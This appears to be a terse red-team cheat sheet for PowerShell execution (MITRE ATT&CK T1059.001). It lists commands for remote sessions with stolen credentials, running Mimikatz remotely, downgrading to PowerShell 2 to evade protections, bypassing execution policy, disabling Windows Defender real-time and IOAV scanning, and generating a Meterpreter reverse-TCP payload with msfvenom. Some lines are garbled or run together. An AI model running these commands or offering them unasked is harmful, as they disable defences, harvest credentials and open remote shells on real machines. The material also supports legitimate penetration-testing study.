| description |
|---|
MITRE ATT&CK, Execution, Technique T1059.001 |
Background: We can establish a persistent connection in PowerShell using Enter-PSSession. This can make life significantly easier and reduce overhead.
New-PSSession -ComputerName [IP] -Credential [USER]
Enter-PSSession -Session $#Background: We can execute scripts remotely with PowerShell.
Invoke-Command -Session $# -FilePath C:\Users\Parzival\Desktop\Mimikatz.exeBackground: This can be helpful when determining if a PowerShell downgrade attack will work.
(Get-ItemProperty HKLM:\SOFTWARE\Microsoft\PowerShell\*\PowerShellEngin e -Name PowerShellVersion).PowerShellVersionThis is important as if PowerShell 2.0 is installed then we can bypass multiple security protections enabled in more recent PowerShell Version 5 releases:
powershell.exe -Version 2Information: Execution policies can be disabled in multiple ways. It is not a sufficient security protection to prevent unsigned scripts from being loaded.
powershell.exe -exec bypass
Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope ProcessPowershell Set-MpPreference -DisableRealtimeMonitoring $true
Powershell Set-MpPreference -DisableIOAVProtection $truemsfvenom -p cmd/windows/powershell/meterpreter/reverse_tcp LHOST=$ip LPORT=$port